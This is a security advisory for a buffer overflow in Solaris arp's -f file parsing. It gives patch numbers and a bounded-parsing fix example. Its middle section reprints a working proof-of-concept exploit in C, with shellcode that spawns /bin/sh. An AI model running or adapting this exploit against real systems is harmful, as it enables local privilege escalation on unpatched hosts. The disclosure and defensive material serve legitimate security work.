Solaris arp buffer overflow vulnerability

Published: 2001-01-13
Updated: 2001-01-13
Severity: High
Threat level: local privilege escalation (the description below states that code runs as user bin)
Error type: input validation error
Exploitation mode: server mode

Affected systems
Sun Solaris 7.0_x86

Description
arp is the tool for viewing and managing the table that maps IP addresses to network hardware addresses. For convenience, Solaris arp supports an option (-f) that inserts multiple entries read from a file. The values in that file are parsed with sscanf() as strings, but the code does not ensure that their length stays within the space allocated for the local variables that receive them. An over-long entry therefore overwrites the stack and corrupts the program's control flow. A local user can exploit this to execute arbitrary code with the privileges of the user "bin".

Proof of concept
The original proof of concept, with the standard headers it needs added so that it compiles cleanly; its behaviour is unchanged.

/* arpexp.c
 * arp overflow proof of concept by ahmed@securityfocus.com
 * tested on x86 solaris 7,8beta
 * default should work. if not, arg1 = offset. +- by 100's
 * Copyright Security-Focus.com, 11/2000
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Returns the current stack pointer (32-bit x86 only; the value is left in %eax). */
long get_esp()
{
    __asm__("movl %esp,%eax");
}

int main(int ac, char **av)
{
    /* Solaris/x86 shellcode; the trailing bytes spell "/bin/sh". */
    char shell[] =
        "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
        "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
        "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
        "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
        "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
        "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
        "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
        "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
        "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
        "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
        "\xff\xff";
    unsigned long magic = 0x8047b78;     /* fixed value the PoC places at offset 52 of the entry */
    unsigned long r = get_esp() + 600;   /* guessed address of the shellcode in the environment */
    unsigned char buf[300];
    int f;

    if (ac == 2)
        r += atoi(av[1]);                /* optional offset adjustment from the command line */

    /* Over-long entry: 300 bytes of 'a' with magic at offset 52 and the return address at offset 76. */
    memset(buf, 0x61, sizeof(buf));
    memcpy(buf + 52, &magic, 4);
    memcpy(buf + 76, &r, 4);

    /* Write the malicious arp -f file: four short tokens followed by the over-long one. */
    f = open("/tmp/ypx", O_CREAT | O_WRONLY, 0600);
    write(f, "1 2 3 4 ", 8);
    write(f, buf, sizeof(buf));
    close(f);

    /* Put the shellcode into the environment as LOL=<NOP sled><shellcode>. */
    memset(buf, 0x90, sizeof(buf));
    memcpy(buf, "LOL=", 4);
    memcpy(buf + (sizeof(buf) - strlen(shell)), shell, strlen(shell));
    putenv((char *)buf);

    /* Run the vulnerable arp against the crafted file, then remove the file. */
    system("/usr/sbin/arp -f /tmp/ypx");
    unlink("/tmp/ypx");
    return 0;
}

Solution
Apply the following patches:
Sun Solaris 7.0_x86: Sun patch 109710-01
Sun Solaris 7.0: Sun patch 109709-01
Sun Solaris 2.6_x86: Sun patch 109720-01
Sun Solaris 2.6: Sun patch 109719-01
Sun Solaris 2.5.1_x86: Sun patch 109722-01
Sun Solaris 2.5.1: Sun patch 109721-01
Sun Solaris 2.5_x86: Sun patch 109708-01
Sun Solaris 2.5: Sun patch 109707-01
Sun Solaris 2.4_x86: Sun patch 109724-01
Sun Solaris 2.4: Sun patch 109723-01
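To make the flaw in the description concrete, the following added example (written for this page; it is not Sun's arp source and not part of the original advisory) contrasts an entry parser built the way the description says arp handles -f files, with sscanf() %s conversions into fixed-size locals and no width limit, against a hardened version that bounds each conversion and rejects tokens that do not fit. The field sizes, function names and sample lines are constructed assumptions; the "hostname ether_addr [flags]" line layout follows the arp -f file format.

```c
#include <stdio.h>
#include <string.h>

#define HOST_MAX  64   /* longest hostname accepted (assumed size) */
#define ETHER_MAX 17   /* "aa:bb:cc:dd:ee:ff" */

struct arp_entry {
    char host[HOST_MAX + 1];
    char ether[ETHER_MAX + 1];
};

/*
 * The pattern the advisory describes: %s conversions with no field width,
 * writing into fixed-size locals.  A token longer than the buffer runs past
 * it onto the rest of the stack frame (saved registers, return address).
 * Kept only for contrast; the demo functions below never call it.
 */
int parse_entry_unsafe(const char *line, struct arp_entry *e)
{
    char host[HOST_MAX + 1];
    char ether[ETHER_MAX + 1];

    if (sscanf(line, "%s %s", host, ether) != 2)   /* no bound on either token */
        return -1;
    strcpy(e->host, host);
    strcpy(e->ether, ether);
    return 0;
}

/*
 * Hardened version.  Each scratch buffer is two bytes longer than the field
 * it feeds and the scanf width is one more than the field length, so an
 * over-long token shows up as strlen() == MAX + 1 and can be rejected,
 * instead of overflowing the buffer or being silently truncated.
 */
int parse_entry_safe(const char *line, struct arp_entry *e)
{
    char host[HOST_MAX + 2];
    char ether[ETHER_MAX + 2];

    /* widths are HOST_MAX + 1 = 65 and ETHER_MAX + 1 = 18; sscanf adds the NUL */
    if (sscanf(line, "%65s %18s", host, ether) != 2)
        return -1;                                  /* malformed entry */
    if (strlen(host) > HOST_MAX || strlen(ether) > ETHER_MAX)
        return -2;                                  /* token does not fit: reject the line */
    memcpy(e->host, host, strlen(host) + 1);
    memcpy(e->ether, ether, strlen(ether) + 1);
    return 0;
}

/* Constructed benign line: returns 1 if it parses and both fields come back intact. */
int demo_benign(void)
{
    struct arp_entry e;
    const char *line = "gateway 8:0:20:11:22:33 pub";

    if (parse_entry_safe(line, &e) != 0)
        return 0;
    return strcmp(e.host, "gateway") == 0 &&
           strcmp(e.ether, "8:0:20:11:22:33") == 0;
}

/* Constructed line with a 300-byte hostname token, the same shape as the
 * over-long entry the proof of concept writes to /tmp/ypx. */
int demo_overlong(void)
{
    struct arp_entry e;
    char line[320];

    memset(line, 'a', 300);
    memcpy(line + 300, " 8:0:20:11:22:33", 17);   /* 16 chars plus NUL */
    return parse_entry_safe(line, &e);             /* -2: rejected, nothing overwritten */
}

/* Constructed line with only one token: malformed, not over-long. */
int demo_malformed(void)
{
    struct arp_entry e;
    return parse_entry_safe("gateway", &e);        /* -1 */
}

int main(void)
{
    printf("benign    -> %d (1 = fields intact)\n", demo_benign());
    printf("overlong  -> %d (-2 = rejected)\n", demo_overlong());
    printf("malformed -> %d (-1 = malformed)\n", demo_malformed());
    return 0;
}
```

The width-plus-one trick matters because a plain "%64s" would accept the first 64 bytes of a 300-byte token and discard the rest, so the entry would be inserted under a hostname the administrator never wrote; rejecting the whole line is the safer failure mode.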